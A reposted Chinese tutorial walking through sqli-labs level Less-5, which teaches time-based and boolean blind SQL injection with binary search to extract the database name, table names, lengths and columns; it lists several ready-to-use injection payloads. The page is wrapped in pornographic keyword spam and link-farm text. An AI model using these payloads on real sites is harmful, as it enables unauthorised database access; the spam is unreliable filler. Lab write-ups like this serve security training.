日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Less-5

發(fā)布時間:2025/7/14 编程问答 38 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Less-5 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

第5關,這關設計到的東西是盲注,不知道小伙伴們有沒有聽過,我們先來看一下這也頁面。

沒有打印出賬號密碼,只打印了是否存在。盲注的意思是用一個邏輯來判斷是否存在某個庫或表或字段。盲注又分了3種:1、基于時間的盲注。 2、基于布爾的盲注。 3、基于報錯的盲注。我來列舉兩種。

時間注入:

select * from users where id =1 and 1=(if(substr(database(),1,1)='t',1,sleep(2)));

這句話的意思是,查詢id=1來著users表里所以的內容,并且當數據庫的第一個字母為t是會返回1,前面的1=1就成立了,也就查詢成功。如果不是t,那么就會停止兩秒。

可以看到左下見的等待響應,這說明了當前數據庫的第一個字符不為t。這樣我們又可以進行注入了。哈哈哈

布爾盲注:

這個其實也和時間盲注差不多,我覺得比時間盲注更好一些。

select * from users where id =1 and 1=(if(substr(database(),1,1)='t',1,0));

語句差不多,主要還是看自己的用途來構造,我也來截張圖吧

下面開始講講實例:

先看數據庫的版本,payload:  ' and 1=(if(substr(version(),1,1)=5,1,0))%23

沒報錯,說明數據庫版本大于5。我們知道數據庫版面為5,就可以利用那個默認庫information_schema了

然后我可以猜一下他的數據庫名paylaod:? ' and 1=(if(substr(database(),1,1)>'a',1,0))%23

沒報錯,說明數據庫名第一個大于a,這個時候我們就可以用2分法了,不知道大家知不知道2分法,我在這給大家稍微講一講,2分發(fā),也叫2分查找法,就比如上面的例子,大于a是沒問題的,但是我們改成m呢?

還是成立的,我們再改成z看看。

這個時候不成立了,1=0,不能構成關系式了。所以查不到東西。我們把他改成t,也就是m和z的中間那個。

不成立,照舊,改成m和t中間的那個。也就是p或q,我們先試一試p

成立,改成q或者r,先試一試q

成立,我們再試一試r

成立,只剩下r到t了,我們先試一試中間的s

無查詢結果,又小于t,我們可以把大于號改成=試一試。

ok,數據庫名字第一個為s,這就是2分法的用處,它是一種效率較高的查找方法,如果一個一個去試的話,要大概19次,我們才用了8次。

根據以上得知數據庫名為security,那我們利用此方式獲取security數據庫下的表

我們現在來獲取當前數據庫中第一個表名的第一個字 payload:  ' and 1=(if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',1,0))#

用2分法可以發(fā)現他的表明為emails,對了突然想起沒有給你們講怎么獲取他的長度。我們這時候要用到length

我來演示怎么獲取第一個表的長度 payload:  ' and length((select table_name from information_schema.tables where table_schema = database() limit 0,1))=6 #? ? ?還是用2分法來做。

然后我們來獲取一下他的列名 payload:  ' and 1=(select 1 from information_schema.columns where table_name = 'emails' and column_name regexp '^i' limit 0,1) %23

可以知道emails的第一個列名為i開頭的。然后慢慢試知道了他為id。我們接著來過去他id里的內容。 payload:  ' and '1'=(select id from security.emails limit 0,1)%23

我們只要把'1'里面的東西換成我們猜的東西就行了。。。

轉載于:https://www.cnblogs.com/sutdy/p/8724426.html

總結

以上是生活随笔為你收集整理的Less-5的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: www.白丝 | 天天干天天爽天天操 | 特黄在线 | 免费av在线网站 | 综合激情亚洲 | 中文字幕人成乱码熟女香港 | 国产综合视频在线 | 福利在线免费观看 | 久久有精品 | 国产精品二区视频 | 欧美在线小视频 | 国产乱码久久久 | 午夜av网址 | 精品视频免费播放 | 古代黄色一级片 | 国产秋霞| 成人黄色在线免费观看 | 玖玖热视频 | 鲁大师私人影院在线观看 | av不卡免费在线观看 | 在线视频精品免费 | 亚洲国产日韩在线观看 | 亚洲一区有码 | 成人亚洲免费 | 日本黄色免费 | 成人日韩在线 | 国产一区二区三区四区五区美女 | 性感美女视频一二三 | 亚洲大尺度网站 | 亚洲破处视频 | 高清视频一区二区三区 | 日本美女上床 | 亚洲精品久久久久久无码色欲四季 | 国产一线二线在线观看 | 成人做受视频试看60秒 | 精品无码一区二区三区的天堂 | 亚洲黄色av | 日韩一级中文字幕 | 少妇淫片 | 韩国精品在线观看 | 麻豆成人在线 | 奇米激情| 国产一区二区三区影视 | 久久精品牌麻豆国产大山 | 欧美精品一区在线观看 | 国产伦精品一区二区三区视频黑人 | 免费欧美在线 | 亚洲精选久久久 | 久久精品欧美视频 | 日本变态折磨凌虐bdsm在线 | 蜜臀av88| 毛片亚洲av无码精品国产午夜 | 免费精品在线观看 | av久色 | 男人的天堂一级片 | 中文字幕制服诱惑 | a免费毛片 | 蜜桃综合| 日韩久久精品 | 中文精品一区二区三区 | 久久疯狂做爰流白浆xx | 99久久99久久精品免费看蜜桃 | 伊人影院综合在线 | 久久久久成人精品无码中文字幕 | 国产传媒欧美日韩 | 三级黄色网络 | 天天色天天插 | 日韩在线视频你懂的 | 伊人国产女| 日韩精品在线观看视频 | 日韩国产成人 | 日韩视频一区二区在线观看 | 欧美做受xxxxxⅹ性视频 | 综合精品国产 | 日本少妇网站 | 黄色一机片 | 91精品国产乱码久久久久久久久 | 久久久久久91香蕉国产 | 国产三级av在线播放 | 大肉大捧一进一出视频 | 黄色av网站在线看 | 天天色图片 | 亚洲专区欧美专区 | 国产97在线观看 | 久草视频播放 | 又黄又爽又色的视频 | 国产高清一 | 五月婷婷综合色 | 免费成人毛片 | 女人18毛片毛片毛片毛片区二 | 国产精品一区二区小说 | 波多野吉衣av在线 | 鸭子av| 精品少妇人妻av一区二区三区 | 在线观看亚洲欧美 | 国产成人精品影院 | 性色欲情网站iwww九文堂 | 在哪里可以看毛片 | 亚洲免费色视频 |